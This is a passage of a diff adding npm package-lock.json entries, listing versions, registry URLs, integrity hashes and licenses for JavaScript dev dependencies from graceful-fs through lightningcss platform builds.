+ "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/has-bigints": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-bigints/-/has-bigints-1.1.0.tgz", + "integrity": "sha512-R3pbpkcIqv2Pm3dUwgjclDRVmWpTJW2DcMzcIhEXEx1oh/CEMObMm3KLmRJOdvhM7o4uQBnwr8pzRK2sJWIqfg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/has-property-descriptors": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-property-descriptors/-/has-property-descriptors-1.0.2.tgz", + "integrity": "sha512-55JNKuIW+vq4Ke1BjOTjM2YctQIvCT7GFzHwmfZPGo5wnrgkid0YQtnAleFSqumZm4az3n2BS+erby5ipJdgrg==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-define-property": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-proto": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/has-proto/-/has-proto-1.2.0.tgz", + "integrity": "sha512-KIL7eQPfHQRC8+XluaIw7BHUwwqL19bQn4hzNgdr+1wXoU0KKj6rufu47lhY7KbJR2C6T6+PfyN0Ea7wkSS+qQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/hasown": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz", + "integrity": "sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==", + "dev": true, + "license": "MIT", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/ignore": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.2.tgz", + "integrity": "sha512-hsBTNUqQTDwkWtcdYI2i06Y/nUBEsNEDJKjWdigLvegy8kDuJAS8uRlpkkcQpyEXL0Z/pjDy5HBmMjRCJ2gq+g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 4" + } + }, + "node_modules/import-fresh": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.1.tgz", + "integrity": "sha512-TR3KfrTZTYLPB6jUjfx6MF9WcWrHL9su5TObK4ZkYgBdWKPOFoSoQIdEuTuR82pmtxH2spWG9h6etwfr1pLBqQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.8.19" + } + }, + "node_modules/internal-slot": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/internal-slot/-/internal-slot-1.1.0.tgz", + "integrity": "sha512-4gd7VpWNQNB4UKKCFFVcp1AVv+FMOgs9NKzjHKusc8jTMhd5eL1NqQqOpE0KzMds804/yHlglp3uxgluOqAPLw==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "hasown": "^2.0.2", + "side-channel": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-array-buffer": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.5.tgz", + "integrity": "sha512-DDfANUiiG2wC1qawP66qlTugJeL5HyzMpfr8lLK+jMQirGzNod0B12cFB/9q838Ru27sBwfw78/rdoU7RERz6A==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.3", + "get-intrinsic": "^1.2.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-async-function": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-async-function/-/is-async-function-2.1.1.tgz", + "integrity": "sha512-9dgM/cZBnNvjzaMYHVoxxfPj2QXt22Ev7SuuPrs+xav0ukGB0S6d4ydZdEiM48kLx5kDV+QBPrpVnFyefL8kkQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "async-function": "^1.0.0", + "call-bound": "^1.0.3", + "get-proto": "^1.0.1", + "has-tostringtag": "^1.0.2", + "safe-regex-test": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bigint": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/is-bigint/-/is-bigint-1.1.0.tgz", + "integrity": "sha512-n4ZT37wG78iz03xPRKJrHTdZbe3IicyucEtdRsV5yglwc3GyUfbAfpSeD0FJ41NbUNSt5wbhqfp1fS+BgnvDFQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-bigints": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-boolean-object": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/is-boolean-object/-/is-boolean-object-1.2.2.tgz", + "integrity": "sha512-wa56o2/ElJMYqjCjGkXri7it5FbebW5usLw/nPmCMs5DeZ7eziSYZhSmPRn0txqeW4LnAmQQU7FgqLpsEFKM4A==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bun-module": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-bun-module/-/is-bun-module-2.0.0.tgz", + "integrity": "sha512-gNCGbnnnnFAUGKeZ9PdbyeGYJqewpmc2aKHUEMO5nQPWU9lOmv7jcmQIv+qHD8fXW6W7qfuCwX4rY9LNRjXrkQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "semver": "^7.7.1" + } + }, + "node_modules/is-callable": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/is-callable/-/is-callable-1.2.7.tgz", + "integrity": "sha512-1BC0BVFhS/p0qtw6enp8e+8OD0UrK0oFLztSjNzhcKA3WDuJxxAPXzPuPtKkjEY9UUoEWlX/8fgKeu2S8i9JTA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-core-module": { + "version": "2.16.1", + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz", + "integrity": "sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==", + "dev": true, + "license": "MIT", + "dependencies": { + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-data-view": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-data-view/-/is-data-view-1.0.2.tgz", + "integrity": "sha512-RKtWF8pGmS87i2D6gqQu/l7EYRlVdfzemCJN/P3UOs//x1QE7mfhvzHIApBTRf7axvT6DMGwSwBXYCT0nfB9xw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "get-intrinsic": "^1.2.6", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-date-object": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/is-date-object/-/is-date-object-1.1.0.tgz", + "integrity": "sha512-PwwhEakHVKTdRNVOw+/Gyh0+MzlCl4R6qKvkhuvLtPMggI1WAHt9sOwZxQLSGpUaDnrdyDsomoRgNnCfKNSXXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-extglob": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-finalizationregistry": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-finalizationregistry/-/is-finalizationregistry-1.1.1.tgz", + "integrity": "sha512-1pC6N8qWJbWoPtEjgcL2xyhQOP491EQjeUo3qTKcmV8YSDDJrOepfG8pcC7h/QgnQHYSv0mJ3Z/ZWxmatVrysg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-generator-function": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.1.2.tgz", + "integrity": "sha512-upqt1SkGkODW9tsGNG5mtXTXtECizwtS2kA161M+gJPc1xdb/Ax629af6YrTwcOeQHbewrPNlE5Dx7kzvXTizA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.4", + "generator-function": "^2.0.0", + "get-proto": "^1.0.1", + "has-tostringtag": "^1.0.2", + "safe-regex-test": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-glob": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-extglob": "^2.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-map": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-map/-/is-map-2.0.3.tgz", + "integrity": "sha512-1Qed0/Hr2m+YqxnM09CjA2d/i6YZNfF6R2oRAOj36eUdS6qIV/huPJNSEpKbupewFs+ZsJlxsjjPbc0/afW6Lw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-negative-zero": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-negative-zero/-/is-negative-zero-2.0.3.tgz", + "integrity": "sha512-5KoIu2Ngpyek75jXodFvnafB6DJgr3u8uuK0LEZJjrU19DrMD3EVERaR8sjz8CCGgpZvxPl9SuE1GMVPFHx1mw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/is-number-object": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-number-object/-/is-number-object-1.1.1.tgz", + "integrity": "sha512-lZhclumE1G6VYD8VHe35wFaIif+CTy5SJIi5+3y4psDgWu4wPDoBhF8NxUOinEc7pHgiTsT6MaBb92rKhhD+Xw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-regex": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.2.1.tgz", + "integrity": "sha512-MjYsKHO5O7mCsmRGxWcLWheFqN9DJ/2TmngvjKXihe6efViPqc274+Fx/4fYj/r03+ESvBdTXK0V6tA3rgez1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "gopd": "^1.2.0", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-set": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-set/-/is-set-2.0.3.tgz", + "integrity": "sha512-iPAjerrse27/ygGLxw+EBR9agv9Y6uLeYVJMu+QNCoouJ1/1ri0mGrcWpfCqFZuzzx3WjtwxG098X+n4OuRkPg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-shared-array-buffer": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-shared-array-buffer/-/is-shared-array-buffer-1.0.4.tgz", + "integrity": "sha512-ISWac8drv4ZGfwKl5slpHG9OwPNty4jOWPRIhBpxOoD+hqITiwuipOQ2bNthAzwA3B4fIjO4Nln74N0S9byq8A==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-string": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-string/-/is-string-1.1.1.tgz", + "integrity": "sha512-BtEeSsoaQjlSPBemMQIrY1MY0uM6vnS1g5fmufYOtnxLGUZM2178PKbhsk7Ffv58IX+ZtcvoGwccYsh0PglkAA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-symbol": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-symbol/-/is-symbol-1.1.1.tgz", + "integrity": "sha512-9gGx6GTtCQM73BgmHQXfDmLtfjjTUDSyoxTCbp5WtoixAhfgsDirWIcVQ/IHpvI5Vgd5i/J5F7B9cN/WlVbC/w==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.2", + "has-symbols": "^1.1.0", + "safe-regex-test": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typed-array": { + "version": "1.1.15", + "resolved": "https://registry.npmjs.org/is-typed-array/-/is-typed-array-1.1.15.tgz", + "integrity": "sha512-p3EcsicXjit7SaskXHs1hA91QxgTw46Fv6EFKKGS5DRFLD8yKnohjF3hxoju94b/OcMZoQukzpPpBE9uLVKzgQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "which-typed-array": "^1.1.16" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakmap": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-weakmap/-/is-weakmap-2.0.2.tgz", + "integrity": "sha512-K5pXYOm9wqY1RgjpL3YTkF39tni1XajUIkawTLUo9EZEVUFga5gSQJF8nNS7ZwJQ02y+1YCNYcMh+HIf1ZqE+w==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakref": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-weakref/-/is-weakref-1.1.1.tgz", + "integrity": "sha512-6i9mGWSlqzNMEqpCp93KwRS1uUOodk2OJ6b+sq7ZPDSy2WuI5NFIxp/254TytR8ftefexkWn5xNiHUNpPOfSew==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakset": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/is-weakset/-/is-weakset-2.0.4.tgz", + "integrity": "sha512-mfcwb6IzQyOKTs84CQMrOwW4gQcaTOAWJ0zzJCl2WSPDrWk/OzDaImWFH3djXhb24g4eudZfLRozAvPGw4d9hQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bound": "^1.0.3", + "get-intrinsic": "^1.2.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/isarray": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-2.0.5.tgz", + "integrity": "sha512-xHjhDr3cNBK0BzdUJSPXZntQUx/mwMS5Rw4A7lPJ90XGAO6ISP/ePDNuo0vhqOZU+UD5JoodwCAAoZQd3FeAKw==", + "dev": true, + "license": "MIT" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true, + "license": "ISC" + }, + "node_modules/iterator.prototype": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/iterator.prototype/-/iterator.prototype-1.1.5.tgz", + "integrity": "sha512-H0dkQoCa3b2VEeKQBOxFph+JAbcrQdE7KC0UkqwpLmv2EC4P41QXP+rqo9wYodACiG5/WM5s9oDApTU8utwj9g==", + "dev": true, + "license": "MIT", + "dependencies": { + "define-data-property": "^1.1.4", + "es-object-atoms": "^1.0.0", + "get-intrinsic": "^1.2.6", + "get-proto": "^1.0.0", + "has-symbols": "^1.1.0", + "set-function-name": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/jiti": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/jiti/-/jiti-2.6.1.tgz", + "integrity": "sha512-ekilCSN1jwRvIbgeg/57YFh8qQDNbwDb9xT/qu2DAHbFFZUicIl4ygVaAvzveMhMVr3LnpSKTNnwt8PoOfmKhQ==", + "dev": true, + "license": "MIT", + "bin": { + "jiti": "lib/jiti-cli.mjs" + } + }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/js-yaml": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.1.tgz", + "integrity": "sha512-qQKT4zQxXl8lLwBtHMWwaTcGfFOZviOJet3Oy/xmGk2gZH677CJM9EvtfdSkgWcATZhj/55JZ0rmy3myCT5lsA==", + "dev": true, + "license": "MIT", + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/json-buffer": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/json-buffer/-/json-buffer-3.0.1.tgz", + "integrity": "sha512-4bV5BfR2mqfQTJm+V5tPPdf+ZpuhiIvTuAB5g8kcrXOZpTT/QwwVRWBywX1ozr6lEuPdbHxwaJlm9G6mI2sfSQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", + "dev": true, + "license": "MIT" + }, + "node_modules/json-stable-stringify-without-jsonify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", + "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", + "dev": true, + "license": "MIT" + }, + "node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/jsx-ast-utils": { + "version": "3.3.5", + "resolved": "https://registry.npmjs.org/jsx-ast-utils/-/jsx-ast-utils-3.3.5.tgz", + "integrity": "sha512-ZZow9HBI5O6EPgSJLUb8n2NKgmVWTwCvHGwFuJlMjvLFqlGG6pjirPhtdsseaLZjSibD8eegzmYpUZwoIlj2cQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "array-includes": "^3.1.6", + "array.prototype.flat": "^1.3.1", + "object.assign": "^4.1.4", + "object.values": "^1.1.6" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/keyv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/keyv/-/keyv-4.5.4.tgz", + "integrity": "sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==", + "dev": true, + "license": "MIT", + "dependencies": { + "json-buffer": "3.0.1" + } + }, + "node_modules/language-subtag-registry": { + "version": "0.3.23", + "resolved": "https://registry.npmjs.org/language-subtag-registry/-/language-subtag-registry-0.3.23.tgz", + "integrity": "sha512-0K65Lea881pHotoGEa5gDlMxt3pctLi2RplBb7Ezh4rRdLEOtgi7n4EwK9lamnUCkKBqaeKRVebTq6BAxSkpXQ==", + "dev": true, + "license": "CC0-1.0" + }, + "node_modules/language-tags": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/language-tags/-/language-tags-1.0.9.tgz", + "integrity": "sha512-MbjN408fEndfiQXbFQ1vnd+1NoLDsnQW41410oQBXiyXDMYH5z505juWa4KUE1LqxRC7DgOgZDbKLxHIwm27hA==", + "dev": true, + "license": "MIT", + "dependencies": { + "language-subtag-registry": "^0.3.20" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/lightningcss": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss/-/lightningcss-1.32.0.tgz", + "integrity": "sha512-NXYBzinNrblfraPGyrbPoD19C1h9lfI/1mzgWYvXUTe414Gz/X1FD2XBZSZM7rRTrMA8JL3OtAaGifrIKhQ5yQ==", + "dev": true, + "license": "MPL-2.0", + "dependencies": { + "detect-libc": "^2.0.3" + }, + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + }, + "optionalDependencies": { + "lightningcss-android-arm64": "1.32.0", + "lightningcss-darwin-arm64": "1.32.0", + "lightningcss-darwin-x64": "1.32.0", + "lightningcss-freebsd-x64": "1.32.0", + "lightningcss-linux-arm-gnueabihf": "1.32.0", + "lightningcss-linux-arm64-gnu": "1.32.0", + "lightningcss-linux-arm64-musl": "1.32.0", + "lightningcss-linux-x64-gnu": "1.32.0", + "lightningcss-linux-x64-musl": "1.32.0", + "lightningcss-win32-arm64-msvc": "1.32.0", + "lightningcss-win32-x64-msvc": "1.32.0" + } + }, + "node_modules/lightningcss-android-arm64": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-android-arm64/-/lightningcss-android-arm64-1.32.0.tgz", + "integrity": "sha512-YK7/ClTt4kAK0vo6w3X+Pnm0D2cf2vPHbhOXdoNti1Ga0al1P4TBZhwjATvjNwLEBCnKvjJc2jQgHXH0NEwlAg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-darwin-arm64": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-darwin-arm64/-/lightningcss-darwin-arm64-1.32.0.tgz", + "integrity": "sha512-RzeG9Ju5bag2Bv1/lwlVJvBE3q6TtXskdZLLCyfg5pt+HLz9BqlICO7LZM7VHNTTn/5PRhHFBSjk5lc4cmscPQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-darwin-x64": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-darwin-x64/-/lightningcss-darwin-x64-1.32.0.tgz", + "integrity": "sha512-U+QsBp2m/s2wqpUYT/6wnlagdZbtZdndSmut/NJqlCcMLTWp5muCrID+K5UJ6jqD2BFshejCYXniPDbNh73V8w==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-freebsd-x64": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-freebsd-x64/-/lightningcss-freebsd-x64-1.32.0.tgz", + "integrity": "sha512-JCTigedEksZk3tHTTthnMdVfGf61Fky8Ji2E4YjUTEQX14xiy/lTzXnu1vwiZe3bYe0q+SpsSH/CTeDXK6WHig==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm-gnueabihf": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm-gnueabihf/-/lightningcss-linux-arm-gnueabihf-1.32.0.tgz", + "integrity": "sha512-x6rnnpRa2GL0zQOkt6rts3YDPzduLpWvwAF6EMhXFVZXD4tPrBkEFqzGowzCsIWsPjqSK+tyNEODUBXeeVHSkw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm64-gnu": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-gnu/-/lightningcss-linux-arm64-gnu-1.32.0.tgz", + "integrity": 